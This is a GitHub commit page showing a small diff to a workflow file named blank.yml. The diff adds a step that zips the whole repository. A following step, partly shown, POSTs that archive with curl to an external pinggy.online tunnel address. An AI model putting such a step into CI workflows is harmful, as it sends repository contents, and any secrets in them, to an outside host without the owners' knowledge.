Skip to content

Commit

Permalink
Update blank.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
ReinVanbelleghem authored Feb 29, 2024
1 parent 270a4ee commit 981923a
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .github/workflows/blank.yml
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,8 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Compress Folders
run: zip -r repo.zip .
- name: Send Compressed Folder
run: |
curl -X POST https://rncar-157-193-240-178.a.free.pinggy.online/repo \
Expand Down

0 comments on commit 981923a

Please sign in to comment.